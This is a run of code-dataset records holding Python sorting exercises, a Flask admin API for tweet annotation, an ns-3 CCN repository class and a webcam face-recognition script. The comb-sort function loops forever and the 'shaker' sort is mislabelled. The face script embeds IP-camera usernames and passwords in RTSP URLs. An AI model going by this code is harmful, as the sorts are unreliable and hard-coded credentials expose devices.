shake = arr[i]\n j = i - 1\n while (j >= 0) and (arr[j] > shake):\n arr[j + 1] = arr[j]\n j = j - 1\n arr[j + 1] = shake\n return arr\n#print(shaker_sort(spisok1))\n\n# 7 гномья сортировка\ndef gnom(arr):\n i, size = 1, len(arr)\n while i < size:\n if arr[i - 1] <= arr[i]:\n i += 1\n else:\n arr[i], arr[i-1] = arr[i-1], arr[i]\n if i > 1:\n i -= 1\n return arr\n#print(gnom(spisok2))\n\n# 3 сортировка расчесткой\ndef rascheska(arr):\n first = len(arr) - 1\n while first > 0:\n for i in range(0, len(arr) - first):\n if (arr[i] > arr[i + first]):\n arr[i], arr[i + first] = arr[i + first], arr[i]\n step = int(first // 1.25)\n return arr\n#print(rascheska(plane_of_points))\n\n\n# 11 сортировка слиянием\ndef merge_sort (arr):\n if len(arr) < 2:\n return arr\n result = []\n midlle = int(len(arr) / 2)\n one = merge_sort(arr[:midlle])\n two = merge_sort(arr[midlle:])\n i = 0\n j = 0\n while i < len(one) and j < len(two):\n if one[i] > two[j]:\n result.append(two[j])\n j += 1\n else:\n result.append(one[i])\n i += 1\n result += one[i:]\n result += two[j:]\n return result\n#print(merge_sort(list_of_text))\n\n\n\n\n\n","repo_name":"kit8nino/2023-python","sub_path":"ИС34/Монцева Екатерина/[2].py","file_name":"[2].py","file_ext":"py","file_size_in_byte":2461,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"35516189951","text":"__author__ = 'Daksh Patel'\n\nimport os\n\nfrom flask import *\nfrom werkzeug.utils import secure_filename\n\nfrom project import auth\nfrom project.model.tweetModel import *\nfrom utils.utils import *\n\n\n@app.route('/admin/fetch_annotation_overview', methods=['GET'])\n@auth.login_required\ndef fetch_annotation_overview():\n user = g.user\n if \"admin\" in user.roles:\n admin = Admin()\n language = request.args.get('language')\n response = admin.fetch_annotation_by_users(lang=language)\n # print(response)\n code = 200\n status = True\n msg = f'{len(response)} users'\n result = {\n 'annotation_info': response\n }\n resp = createResponse(\n status_value=status,\n code=code,\n message=msg,\n result=result\n )\n return resp\n else:\n resp = unauthorized_access()\n return resp\n\n\n@app.route('/admin/fetch_reported_tweets', methods=['GET'])\n@auth.login_required\ndef fetch_reported_tweets_admin():\n user = g.user\n if \"admin\" in user.roles:\n user_id = user.id\n language = request.args.get('language')\n reported_tweets = ReportedTweets.getAllReportedTweets(lang=language)\n status = True\n code = 200\n msg = f'{len(reported_tweets)} tweets found!'\n if len(reported_tweets) == 0:\n msg = 'User has not reported any tweets yet!'\n msg = msg\n result = {\n 'reported_tweets': reported_tweets\n }\n resp = createResponse(\n status_value=status,\n code=code,\n message=msg,\n result=result\n )\n return resp\n else:\n resp = unauthorized_access()\n return resp\n\n\n@app.route('/admin/fetch_all_annotated_tweets', methods=['GET'])\n@auth.login_required\ndef fetch_all_annotated_tweets():\n user = g.user\n if 'admin' in user.roles:\n language = request.args.get('language')\n tweets = Tweets.objects(Q(total_annotation__gt=0) & Q(lang=language))\n tweets = json.loads(tweets.to_json())\n # print(tweets)\n # print(language, len(tweets))\n code = 200\n status = True\n msg = f'{len(tweets)} tweets found!'\n if len(tweets) == 0:\n msg = 'Annotations not started yet!'\n msg = msg\n result = {\n 'tweets': tweets\n }\n resp = createResponse(\n status_value=status,\n code=code,\n message=msg,\n result=result\n )\n return resp\n else:\n resp = unauthorized_access()\n return resp\n\n\n@app.route('/admin/fetch_statistics', methods=['GET'])\n@auth.login_required\ndef fetch_statistics():\n user = g.user\n if 'admin' in user.roles:\n language = request.args.get('language')\n statistics = Admin.fetch_statistics(lang=language)\n code = 200\n status = True\n msg = f'Data received!'\n # if len(tweets) == 0:\n # msg = 'Annotations not started yet!'\n msg = msg\n result = {\n 'statistics': statistics\n }\n resp = createResponse(\n status_value=status,\n code=code,\n message=msg,\n result=result\n )\n return resp\n else:\n resp = unauthorized_access()\n return resp\n\n\n@app.route('/admin/fetch_users', methods=['GET'])\n@auth.login_required\ndef fetch_users():\n user = g.user\n print(user)\n if \"admin\" in user.roles:\n users = Admin.fetch_all_user()\n code = 200\n status = True\n msg = f'{len(users)} users found!'\n # if len(tweets) == 0:\n # msg = 'Annotations not started yet!'\n msg = msg\n result = {\n 'users': users\n }\n resp = createResponse(\n status_value=status,\n code=code,\n message=msg,\n result=result\n )\n return resp\n else:\n resp = unauthorized_access()\n return resp\n\n\n@app.route('/admin/add_more_tweets', methods=['POST'])\n@auth.login_required\ndef add_more_tweets():\n user = g.user\n if 'admin' in user.roles:\n admin = Admin()\n username = request.form.get('username')\n count = int(request.form.get('count'))\n language = request.form.get('language')\n # if not language:\n # language='en'\n # print(count, type(count))\n statuses = []\n msgs = []\n result = {}\n # for username in usernames:\n # # result[]\n status, msg = admin.add_more_tweets(username, count, lang=language)\n #\n if status:\n code = 200\n result = {}\n resp = createResponse(\n status_value=status,\n code=code,\n message=msg,\n result=result\n )\n return resp\n else:\n code = 400\n result = {}\n resp = createResponse(\n status_value=status,\n code=code,\n message=msg,\n result=result\n )\n return resp\n else:\n resp = unauthorized_access()\n return resp\n\n\n@app.route('/admin/remove_tweets', methods=['POST'])\n@auth.login_required\ndef remove_tweets():\n user = g.user\n if 'admin' in user.roles:\n username = request.form.get('username')\n count = int(request.form.get('count'))\n language = request.form.get('language')\n admin = Admin()\n status, msg = admin.remove_tweets(\n username=username,\n count=count,\n lang=language\n )\n if status:\n code = 200\n result = {}\n resp = createResponse(\n status_value=status,\n code=code,\n message=msg,\n result=result\n )\n return resp\n else:\n code = 400\n result = {}\n resp = createResponse(\n status_value=status,\n code=code,\n message=msg,\n result=result\n )\n return resp\n else:\n resp = unauthorized_access()\n return resp\n\n\n@app.route('/admin/add_user', methods=['POST'])\n@auth.login_required\ndef add_user():\n user = g.user\n if 'admin' in user.roles:\n name = request.form.get('name')\n username = request.form.get('username')\n password = request.form.get('password')\n langs = json.loads(request.form.get('languages'))\n query_set = User.objects(username=username)\n resp = None\n print(type(langs))\n print(request.data)\n print(request.get_data())\n if query_set.count() != 0:\n status = False\n code = 400\n msg = 'Username already exists!'\n result = {}\n resp = createResponse(\n status_value=status,\n code=code,\n message=msg,\n result=result\n )\n else:\n admin = Admin()\n status = admin.create_user(\n name=name,\n username=username,\n password=password,\n lang=langs\n )\n if status:\n code = 200\n result = {}\n msg = 'User added successfully!'\n resp = createResponse(\n status_value=status,\n code=code,\n message=msg,\n result=result\n )\n else:\n code = 400\n result = {}\n msg = 'Something went wrong'\n resp = createResponse(\n status_value=status,\n code=code,\n message=msg,\n result=result\n )\n return resp\n else:\n resp = unauthorized_access()\n return resp\n\n\n@app.route('/admin/upload_more_tweets', methods=['POST'])\n@auth.login_required\ndef upload_more_tweets():\n user = g.user\n if \"admin\" in user.roles:\n file_ = request.files['fileName']\n filename = secure_filename(file_.filename)\n data = file_.read().decode('utf-8')\n tmp_file_ptr = open(\"./tmp/{}\".format(filename), 'w')\n tmp_file_ptr.write(data)\n tmp_file_name = tmp_file_ptr.name\n tmp_file_ptr.close()\n stat, write_file_name = csvToJson(tmp_file_name)\n if stat == True:\n # print(\"erererer\")\n # print(write_file_name)\n data = json.load(open(write_file_name))\n admin = Admin()\n # print(datetime.datetime.now())\n resp = admin.upload_more_tweets(data)\n # print(datetime.datetime.now())\n if resp!=0:\n code = 200\n result = {}\n msg = f'{resp} rows added successfully!'\n resp = createResponse(\n status_value=True,\n code=code,\n message=msg,\n result=result\n )\n # print(resp)\n else:\n os.remove(write_file_name)\n code = 201\n result = {}\n msg = \"No new tweets found in the file: {}\".format(filename)\n resp = createResponse(\n status_value=True,\n code=code,\n message=msg,\n result=result\n )\n # print(resp)\n\n return resp\n else:\n code = 500\n result = {}\n msg = \"Invalid file type or format\"\n resp = createResponse(\n status_value=False,\n code=code,\n message=msg,\n result=result\n )\n return resp\n\n else:\n resp = unauthorized_access()\n return resp\n","repo_name":"daksh2298/annotation-platform","sub_path":"project/controller/adminController.py","file_name":"adminController.py","file_ext":"py","file_size_in_byte":10112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11931563840","text":"from nepi.execution.attribute import Attribute, Flags, Types\nfrom nepi.execution.resource import clsinit_copy, ResourceState \nfrom nepi.resources.linux.ns3.ccn.ns3ccndceapplication import LinuxNS3CCNDceApplication\n\n@clsinit_copy\nclass LinuxNS3DceCCNR(LinuxNS3CCNDceApplication):\n _rtype = \"linux::ns3::dce::CCNR\"\n\n @classmethod\n def _register_attributes(cls):\n max_fanout = Attribute(\"maxFanout\",\n \"Sets the CCNR_BTREE_MAX_FANOUT environmental variable. \",\n flags = Flags.Design)\n\n max_leaf_entries = Attribute(\"maxLeafEntries\",\n \"Sets the CCNR_BTREE_MAX_LEAF_ENTRIES environmental variable. \",\n flags = Flags.Design)\n\n max_node_bytes = Attribute(\"maxNodeBytes\",\n \"Sets the CCNR_BTREE_MAX_NODE_BYTES environmental variable. \",\n flags = Flags.Design)\n\n max_node_pool = Attribute(\"maxNodePool\",\n \"Sets the CCNR_BTREE_MAX_NODE_POOL environmental variable. \",\n flags = Flags.Design)\n\n content_cache = Attribute(\"contentCache\",\n \"Sets the CCNR_CONTENT_CACHE environmental variable. \",\n flags = Flags.Design)\n\n debug = Attribute(\"debug\",\n \"Sets the CCNR_DEBUG environmental variable. \"\n \"Logging level for ccnr. Defaults to WARNING.\",\n type = Types.Enumerate,\n allowed = [\n \"NONE\",\n \"SEVERE\",\n \"ERROR\",\n \"WARNING\",\n \"INFO\",\n \"FINE, FINER, FINEST\"],\n flags = Flags.Design)\n\n directory = Attribute(\"directory\",\n \"Sets the CCNR_DIRECTORY environmental variable. \",\n flags = Flags.Design)\n\n global_prefix = Attribute(\"globalPrefix\",\n \"Sets the CCNR_GLOBAL_PREFIX environmental variable. \",\n flags = Flags.Design)\n\n listen_on = Attribute(\"listenOn\",\n \"Sets the CCNR_LISTEN_ON environmental variable. \",\n flags = Flags.Design)\n\n min_send_bufsize = Attribute(\"minSendBufsize\",\n \"Sets the CCNR_MIN_SEND_BUFSIZE environmental variable. \",\n flags = Flags.Design)\n\n proto = Attribute(\"proto\",\n \"Sets the CCNR_PROTO environmental variable. \",\n flags = Flags.Design)\n\n status_port = Attribute(\"statusPort\",\n \"Sets the CCNR_STATUS_PORT environmental variable. \",\n flags = Flags.Design)\n\n start_write_scope_limit = Attribute(\"startWriteScopeLimit\",\n \"Sets the CCNR_START_WRITE_SCOPE_LIMIT environmental variable. \",\n flags = Flags.Design)\n\n ccns_debug = Attribute(\"ccnsDebug\",\n \"Sets the CCNS_DEBUG environmental variable. \",\n flags = Flags.Design)\n\n ccns_enable = Attribute(\"ccnsEnable\",\n \"Sets the CCNS_ENABLE environmental variable. \",\n flags = Flags.Design)\n\n ccns_faux_error = Attribute(\"ccnsFauxError\",\n \"Sets the CCNS_FAUX_ERROR environmental variable. \",\n flags = Flags.Design)\n\n ccns_heartbeat_micros = Attribute(\"ccnsHeartBeatMicros\",\n \"Sets the CCNS_HEART_BEAT_MICROS environmental variable. \",\n flags = Flags.Design)\n\n ccns_max_compares_busy = Attribute(\"ccnsMaxComparesBusy\",\n \"Sets the CCNS_MAX_COMPARES_BUSY environmental variable. \",\n flags = Flags.Design)\n\n ccns_max_fetch_busy = Attribute(\"ccnsMaxFetchBusy\",\n \"Sets the CCNS_MAX_FETCH_BUSY environmental variable. \",\n flags = Flags.Design)\n\n ccns_node_fetch_lifetime = Attribute(\"ccnsNodeFetchLifetime\",\n \"Sets the CCNS_NODE_FETCH_LIFETIME environmental variable. \",\n flags = Flags.Design)\n\n ccns_note_err = Attribute(\"ccnsNoteErr\",\n \"Sets the CCNS_NOTE_ERR environmental variable. \",\n flags = Flags.Design)\n\n ccns_repo_store = Attribute(\"ccnsRepoStore\",\n \"Sets the CCNS_REPO_STORE environmental variable. \",\n flags = Flags.Design)\n\n ccns_root_advise_fresh = Attribute(\"ccnsRootAdviseFresh\",\n \"Sets the CCNS_ROOT_ADVISE_FRESH environmental variable. \",\n flags = Flags.Design)\n\n ccns_root_advise_lifetime = Attribute(\"ccnsRootAdviseLifetime\",\n \"Sets the CCNS_ROOT_ADVISE_LIFETIME environmental variable. \",\n flags = Flags.Design)\n\n ccns_stable_enabled = Attribute(\"ccnsStableEnabled\",\n \"Sets the CCNS_STABLE_ENABLED environmental variable. \",\n flags = Flags.Design)\n\n ccns_sync_scope = Attribute(\"ccnsSyncScope\",\n \"Sets the CCNS_SYNC_SCOPE environmental variable. \",\n flags = Flags.Design)\n\n repo_file = Attribute(\"repoFile1\",\n \"The Repository uses $CCNR_DIRECTORY/repoFile1 for \"\n \"persistent storage of CCN Content Objects\",\n flags = Flags.Design)\n\n cls._register_attribute(max_fanout)\n cls._register_attribute(max_leaf_entries)\n cls._register_attribute(max_node_bytes)\n cls._register_attribute(max_node_pool)\n cls._register_attribute(content_cache)\n cls._register_attribute(debug)\n cls._register_attribute(directory)\n cls._register_attribute(global_prefix)\n cls._register_attribute(listen_on)\n cls._register_attribute(min_send_bufsize)\n cls._register_attribute(proto)\n cls._register_attribute(status_port)\n cls._register_attribute(start_write_scope_limit)\n cls._register_attribute(ccns_debug)\n cls._register_attribute(ccns_enable)\n cls._register_attribute(ccns_faux_error)\n cls._register_attribute(ccns_heartbeat_micros)\n cls._register_attribute(ccns_max_compares_busy)\n cls._register_attribute(ccns_max_fetch_busy)\n cls._register_attribute(ccns_node_fetch_lifetime)\n cls._register_attribute(ccns_note_err)\n cls._register_attribute(ccns_repo_store)\n cls._register_attribute(ccns_root_advise_fresh)\n cls._register_attribute(ccns_root_advise_lifetime)\n cls._register_attribute(ccns_stable_enabled)\n cls._register_attribute(ccns_sync_scope)\n cls._register_attribute(repo_file)\n\n def _instantiate_object(self):\n if not self.get(\"binary\"):\n self.set(\"binary\", \"ccnr\")\n\n if not self.get(\"environment\"):\n self.set(\"environment\", self._environment)\n \n repoFile1 = self.get(\"repoFile1\")\n if repoFile1:\n env = \"CCNR_DIRECTORY=/REPO/\" \n environment = self.get(\"environment\")\n if environment:\n env += \";\" + environment\n self.set(\"environment\", env)\n self.set(\"files\", \"%s=/REPO/repoFile1\" % repoFile1) \n\n super(LinuxNS3DceCCNR, self)._instantiate_object()\n\n @property\n def _environment(self):\n envs = dict({\n \"maxFanout\": \"CCNR_BTREE_MAX_FANOUT\",\n \"maxLeafEntries\": \"CCNR_BTREE_MAX_LEAF_ENTRIES\",\n \"maxNodeBytes\": \"CCNR_BTREE_MAX_NODE_BYTES\",\n \"maxNodePool\": \"CCNR_BTREE_MAX_NODE_POOL\",\n \"contentCache\": \"CCNR_CONTENT_CACHE\",\n \"debug\": \"CCNR_DEBUG\",\n \"directory\": \"CCNR_DIRECTORY\",\n \"globalPrefix\": \"CCNR_GLOBAL_PREFIX\",\n \"listenOn\": \"CCNR_LISTEN_ON\",\n \"minSendBufsize\": \"CCNR_MIN_SEND_BUFSIZE\",\n \"proto\": \"CCNR_PROTO\",\n \"statusPort\": \"CCNR_STATUS_PORT\",\n \"startWriteScopeLimit\": \"CCNR_START_WRITE_SCOPE_LIMIT\",\n \"ccnsDebug\": \"CCNS_DEBUG\",\n \"ccnsEnable\": \"CCNS_ENABLE\",\n \"ccnsFauxError\": \"CCNS_FAUX_ERROR\",\n \"ccnsHeartBeatMicros\": \"CCNS_HEART_BEAT_MICROS\",\n \"ccnsMaxComparesBusy\": \"CCNS_MAX_COMPARES_BUSY\",\n \"ccnsMaxFetchBusy\": \"CCNS_MAX_FETCH_BUSY\",\n \"ccnsNodeFetchLifetime\": \"CCNS_NODE_FETCH_LIFETIME\",\n \"ccnsNoteErr\": \"CCNS_NOTE_ERR\",\n \"ccnsRepoStore\": \"CCNS_REPO_STORE\",\n \"ccnsRootAdviseFresh\": \"CCNS_ROOT_ADVISE_FRESH\",\n \"ccnsRootAdviseLifetime\": \"CCNS_ROOT_ADVISE_LIFETIME\",\n \"ccnsStableEnabled\": \"CCNS_STABLE_ENABLED\",\n \"ccnsSyncScope\": \"CCNS_SYNC_SCOPE\",\n })\n\n env = \";\".join(map(lambda k: \"%s=%s\" % (envs.get(k), str(self.get(k))), \n [k for k in envs.keys() if self.get(k)]))\n\n return env\n\n\n","repo_name":"phiros/nepi","sub_path":"src/nepi/resources/linux/ns3/ccn/ns3ccnrdceapplication.py","file_name":"ns3ccnrdceapplication.py","file_ext":"py","file_size_in_byte":8447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21912738967","text":"#### https://github.com/ageitgey/face_recognition/tree/master\n#### https://pypi.org/project/face-recognition/\n#### https://viso.ai/computer-vision/deepface/\n#### https://pyimagesearch.com/2021/04/19/face-detection-with-dlib-hog-and-cnn/\nimport face_recognition\nimport cv2\nimport numpy as np\nimport os\n\n# This is a demo of running face recognition on live video from your webcam. It's a little more complicated than the\n# other example, but it includes some basic performance tweaks to make things run a lot faster:\n# 1. Process each video frame at 1/4 resolution (though still display it at full resolution)\n# 2. Only detect faces in every other frame of video.\n\n# PLEASE NOTE: This example requires OpenCV (the `cv2` library) to be installed only to read from your webcam.\n# OpenCV is *not* required to use the face_recognition library. It's only required if you want to run this\n# specific demo. If you have trouble installing it, try any of the other demos that don't require it instead.\n\n###Load sample images and train(recognize) them one by one\n## Load a sample picture and learn how to recognize it.\n# jitu_image = face_recognition.load_image_file(\"./DataScience/OpenCV/CSE-15-Final/1702028_Jitu.png\")\n# jitu_face_encoding = face_recognition.face_encodings(jitu_image)[0]\n\n# ## Load a second sample picture and learn how to recognize it.\n# najmul_image = face_recognition.load_image_file(\"./DataScience/OpenCV/CSE-15-Final/1702069_Najmul.png\")\n# najmul_face_encoding = face_recognition.face_encodings(najmul_image)[0]\n\n# ## Load a second sample picture and learn how to recognize it.\n# akash_image = face_recognition.load_image_file(\"./DataScience/OpenCV/CSE-15-Final/1702013_Akash.jpg\")\n# akash_face_encoding = face_recognition.face_encodings(akash_image)[0]\n\n# ## Load a second sample picture and learn how to recognize it.\n# shaikat_image = face_recognition.load_image_file(\"./DataScience/OpenCV/CSE-15-Final/1702030_Shaikat.jpg\")\n# shaikat_face_encoding = face_recognition.face_encodings(shaikat_image)[0]\n\n\n# ## Create arrays of known face encodings and their names\n# known_face_encodings = [\n# najmul_face_encoding,\n# jitu_face_encoding,\n# akash_face_encoding,\n# shaikat_face_encoding\n# ]\n# known_face_names = [\n# \"Najmul\",\n# \"Jitu\",\n# \"Akash\",\n# \"Shaikat\"\n# ]\n\n###Load sample images and train(recognize) them by a folder\n## Load a sample picture and learn how to recognize it.\n\ndef load_images_from_folder_and_recognize(folder):\n \"this function loads images from a folder and train with their name\"\n known_face_names=[]\n known_face_encodings=[]\n images = []\n for filename in os.listdir(folder):\n img = cv2.imread(os.path.join(folder,filename))\n img_path = os.path.join(folder,filename)\n if img_path is not None:\n #filename with extension\n #print(filename)\n #filename without extension\n indexoflastdot = filename.rfind(\".\")\n onlyfilename=filename[:indexoflastdot]\n\n # Load a sample picture and learn how to recognize it.\n image = face_recognition.load_image_file(img_path)\n image_encoding = face_recognition.face_encodings(image)[0]\n known_face_names.append(onlyfilename)\n known_face_encodings.append(image_encoding)\n print(filename+\" recognizing complete\")\n images.append(img)\n return known_face_names,known_face_encodings\n\nknown_face_names,known_face_encodings=load_images_from_folder_and_recognize('./DataScience/OpenCV/CSE-15-Final/')\n\n## Initialize some variables\nface_locations = []\nface_encodings = []\nface_names = []\nprocess_this_frame = True\n\n## Get a reference to webcam #0 or ipcam (the default one)\nvideo_capture = cv2.VideoCapture(0)\n#video_capture = cv2.VideoCapture('rtsp://foscamr2:foscamr2@192.168.1.2:88/videoMain')\n#video_capture = cv2.VideoCapture('rtsp://visitor1:visitor1@192.168.1.2:88/videoMain')\n\nwhile True:\n # Grab a single frame of video\n ret, frame = video_capture.read()\n\n # Only process every other frame of video to save time\n if process_this_frame:\n # Resize frame of video to 1/4 size for faster face recognition processing\n small_frame = cv2.resize(frame, (0, 0), fx=0.25, fy=0.25)\n\n # Convert the image from BGR color (which OpenCV uses) to RGB color (which face_recognition uses)\n #rgb_small_frame = small_frame[:, :, ::-1] #not works\n #rgb_small_frame = cv2.cvtColor(small_frame, cv2.COLOR_BGR2RGB)\n rgb_small_frame = np.ascontiguousarray(small_frame[:, :, ::-1])\n \n # Find all the faces and face encodings in the current frame of video\n face_locations = face_recognition.face_locations(rgb_small_frame)\n face_encodings = face_recognition.face_encodings(rgb_small_frame, face_locations)\n\n face_names = []\n for face_encoding in face_encodings:\n # See if the face is a match for the known face(s)\n matches = face_recognition.compare_faces(known_face_encodings, face_encoding)\n name = \"Unknown\"\n\n # # If a match was found in known_face_encodings, just use the first one.\n # if True in matches:\n # first_match_index = matches.index(True)\n # name = known_face_names[first_match_index]\n\n # Or instead, use the known face with the smallest distance to the new face\n face_distances = face_recognition.face_distance(known_face_encodings, face_encoding)\n best_match_index = np.argmin(face_distances)\n if matches[best_match_index]:\n name = known_face_names[best_match_index]\n\n face_names.append(name)\n\n process_this_frame = not process_this_frame\n\n\n # Display the results\n for (top, right, bottom, left), name in zip(face_locations, face_names):\n # Scale back up face locations since the frame we detected in was scaled to 1/4 size\n top *= 4\n right *= 4\n bottom *= 4\n left *= 4\n\n # Draw a box around the face\n cv2.rectangle(frame, (left, top), (right, bottom), (255, 115, 115), 2)\n\n # Draw a label with a name below the face\n cv2.rectangle(frame, (left, bottom - 25), (right, bottom), (255, 0, 0), cv2.FILLED)\n #font = cv2.FONT_HERSHEY_DUPLEX\n #font = cv2.FONT_HERSHEY_TRIPLEX\n font = cv2.FONT_HERSHEY_COMPLEX_SMALL\n cv2.putText(frame, name, (left + 6, bottom - 6), font, 0.53, (255, 255, 255), 1)\n\n # Display the resulting image\n cv2.imshow('Video', frame)\n\n # Hit 'q' on the keyboard to quit!\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n# Release handle to the webcam\nvideo_capture.release()\ncv2.destroyAllWindows()\n\n#########Using Multi-processing############\n# import face_recognition\n# import cv2\n# from multiprocessing import Process, Manager, cpu_count, set_start_method\n# import time\n# import numpy as np\n# import threading\n# import platform\n\n\n# # This is a little bit complicated (but fast) example of running face recognition on live video from your webcam.\n# # This example is using multiprocess.\n\n# # PLEASE NOTE: This example requires OpenCV (the `cv2` library) to be installed only to read from your webcam.\n# # OpenCV is *not* required to use the face_recognition library. It's only required if you want to run this\n# # specific demo. If you have trouble installing it, try any of the other demos that don't require it instead.\n\n\n# # Get next worker's id\n# def next_id(current_id, worker_num):\n# if current_id == worker_num:\n# return 1\n# else:\n# return current_id + 1\n\n\n# # Get previous worker's id\n# def prev_id(current_id, worker_num):\n# if current_id == 1:\n# return worker_num\n# else:\n# return current_id - 1\n\n\n# # A subprocess use to capture frames.\n# def capture(read_frame_list, Global, worker_num):\n# # Get a reference to webcam #0 (the default one)\n# #video_capture = cv2.VideoCapture(0)\n# video_capture = cv2.VideoCapture('rtsp://foscamr2:foscamr2@192.168.1.2:88/videoMain')\n# # video_capture.set(3, 640) # Width of the frames in the video stream.\n# # video_capture.set(4, 480) # Height of the frames in the video stream.\n# # video_capture.set(5, 30) # Frame rate.\n# print(\"Width: %d, Height: %d, FPS: %d\" % (video_capture.get(3), video_capture.get(4), video_capture.get(5)))\n\n# while not Global.is_exit:\n# # If it's time to read a frame\n# if Global.buff_num != next_id(Global.read_num, worker_num):\n# # Grab a single frame of video\n# ret, frame = video_capture.read()\n# read_frame_list[Global.buff_num] = frame\n# Global.buff_num = next_id(Global.buff_num, worker_num)\n# else:\n# time.sleep(0.01)\n\n# # Release webcam\n# video_capture.release()\n\n\n# # Many subprocess use to process frames.\n# def process(worker_id, read_frame_list, write_frame_list, Global, worker_num):\n# known_face_encodings = Global.known_face_encodings\n# known_face_names = Global.known_face_names\n# while not Global.is_exit:\n\n# # Wait to read\n# while Global.read_num != worker_id or Global.read_num != prev_id(Global.buff_num, worker_num):\n# # If the user has requested to end the app, then stop waiting for webcam frames\n# if Global.is_exit:\n# break\n\n# time.sleep(0.01)\n\n# # Delay to make the video look smoother\n# time.sleep(Global.frame_delay)\n\n# # Read a single frame from frame list\n# frame_process = read_frame_list[worker_id]\n\n# # Expect next worker to read frame\n# Global.read_num = next_id(Global.read_num, worker_num)\n\n# # Convert the image from BGR color (which OpenCV uses) to RGB color (which face_recognition uses)\n# #rgb_frame = frame_process[:, :, ::-1] not works\n# rgb_frame = np.ascontiguousarray(frame_process[:, :, ::-1])\n\n# # Find all the faces and face encodings in the frame of video, cost most time\n# face_locations = face_recognition.face_locations(rgb_frame)\n# face_encodings = face_recognition.face_encodings(rgb_frame, face_locations)\n\n# # Loop through each face in this frame of video\n# for (top, right, bottom, left), face_encoding in zip(face_locations, face_encodings):\n# # See if the face is a match for the known face(s)\n# matches = face_recognition.compare_faces(known_face_encodings, face_encoding)\n\n# name = \"Unknown\"\n\n# # If a match was found in known_face_encodings, just use the first one.\n# if True in matches:\n# first_match_index = matches.index(True)\n# name = known_face_names[first_match_index]\n\n# # Draw a box around the face\n# cv2.rectangle(frame_process, (left, top), (right, bottom), (0, 0, 255), 2)\n\n# # Draw a label with a name below the face\n# cv2.rectangle(frame_process, (left, bottom - 35), (right, bottom), (0, 0, 255), cv2.FILLED)\n# font = cv2.FONT_HERSHEY_DUPLEX\n# cv2.putText(frame_process, name, (left + 6, bottom - 6), font, 1.0, (255, 255, 255), 1)\n\n# # Wait to write\n# while Global.write_num != worker_id:\n# time.sleep(0.01)\n\n# # Send frame to global\n# write_frame_list[worker_id] = frame_process\n\n# # Expect next worker to write frame\n# Global.write_num = next_id(Global.write_num, worker_num)\n\n\n# if __name__ == '__main__':\n\n# # Fix Bug on MacOS\n# if platform.system() == 'Darwin':\n# set_start_method('forkserver')\n\n# # Global variables\n# Global = Manager().Namespace()\n# Global.buff_num = 1\n# Global.read_num = 1\n# Global.write_num = 1\n# Global.frame_delay = 0\n# Global.is_exit = False\n# read_frame_list = Manager().dict()\n# write_frame_list = Manager().dict()\n\n# # Number of workers (subprocess use to process frames)\n# if cpu_count() > 2:\n# worker_num = cpu_count() - 1 # 1 for capturing frames\n# else:\n# worker_num = 2\n\n# # Subprocess list\n# p = []\n\n# # Create a thread to capture frames (if uses subprocess, it will crash on Mac)\n# p.append(threading.Thread(target=capture, args=(read_frame_list, Global, worker_num,)))\n# p[0].start()\n\n# # Load a sample picture and learn how to recognize it.\n# jitu_image = face_recognition.load_image_file(\"./DataScience/OpenCV/CSE-15-Final/1702028_Jitu.png\")\n# jitu_face_encoding = face_recognition.face_encodings(jitu_image)[0]\n\n# # Load a second sample picture and learn how to recognize it.\n# najmul_image = face_recognition.load_image_file(\"./DataScience/OpenCV/CSE-15-Final/1702069_Najmul.png\")\n# najmul_face_encoding = face_recognition.face_encodings(najmul_image)[0]\n\n# # Load a second sample picture and learn how to recognize it.\n# akash_image = face_recognition.load_image_file(\"./DataScience/OpenCV/CSE-15-Final/1702013_Akash.jpg\")\n# akash_face_encoding = face_recognition.face_encodings(akash_image)[0]\n\n# # Load a second sample picture and learn how to recognize it.\n# shaikat_image = face_recognition.load_image_file(\"./DataScience/OpenCV/CSE-15-Final/1702030_Shaikat.jpg\")\n# shaikat_face_encoding = face_recognition.face_encodings(shaikat_image)[0]\n\n\n# # Create arrays of known face encodings and their names\n# Global.known_face_encodings = [\n# najmul_face_encoding,\n# jitu_face_encoding,\n# akash_face_encoding,\n# shaikat_face_encoding\n# ]\n# Global.known_face_names = [\n# \"Najmul\",\n# \"Jitu\",\n# \"Akash\",\n# \"Shaikat\"\n# ]\n\n# # Create workers\n# for worker_id in range(1, worker_num + 1):\n# p.append(Process(target=process, args=(worker_id, read_frame_list, write_frame_list, Global, worker_num,)))\n# p[worker_id].start()\n\n# # Start to show video\n# last_num = 1\n# fps_list = []\n# tmp_time = time.time()\n# while not Global.is_exit:\n# while Global.write_num != last_num:\n# last_num = int(Global.write_num)\n\n# # Calculate fps\n# delay = time.time() - tmp_time\n# tmp_time = time.time()\n# fps_list.append(delay)\n# if len(fps_list) > 5 * worker_num:\n# fps_list.pop(0)\n# fps = len(fps_list) / np.sum(fps_list)\n# print(\"fps: %.2f\" % fps)\n\n# # Calculate frame delay, in order to make the video look smoother.\n# # When fps is higher, should use a smaller ratio, or fps will be limited in a lower value.\n# # Larger ratio can make the video look smoother, but fps will hard to become higher.\n# # Smaller ratio can make fps higher, but the video looks not too smoother.\n# # The ratios below are tested many times.\n# if fps < 6:\n# Global.frame_delay = (1 / fps) * 0.75\n# elif fps < 20:\n# Global.frame_delay = (1 / fps) * 0.5\n# elif fps < 30:\n# Global.frame_delay = (1 / fps) * 0.25\n# else:\n# Global.frame_delay = 0\n\n# # Display the resulting image\n# cv2.imshow('Video', write_frame_list[prev_id(Global.write_num, worker_num)])\n\n# # Hit 'q' on the keyboard to quit!\n# if cv2.waitKey(1) & 0xFF == ord('q'):\n# Global.is_exit = True\n# break\n\n# time.sleep(0.01)\n\n# # Quit\n# cv2.destroyAllWindows()\n","repo_name":"Ayad-Mihidabi-Khan-Jitu/Workspace-Learning","sub_path":"DataScience/OpenCV/Face_Recognition_IP_Cam_with_face-recognition_1_3_0.py","file_name":"Face_Recognition_IP_Cam_with_face-recognition_1_3_0.py","file_ext":"py","file_size_in_byte":15645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8908046879","text":"n = int(input())\n\nR_tbl = dict() # Create a dictionary to store the resitor\n\nfor i in range(n):\n name, r = input().split()\n R_tbl[name] = int(r)\n\ncircuit = input().split(\" \")\n\nlist = []\nfor c in circuit:\n if c == ')':\n i = list.index('(')\n r = sum(R_tbl[x] for x in 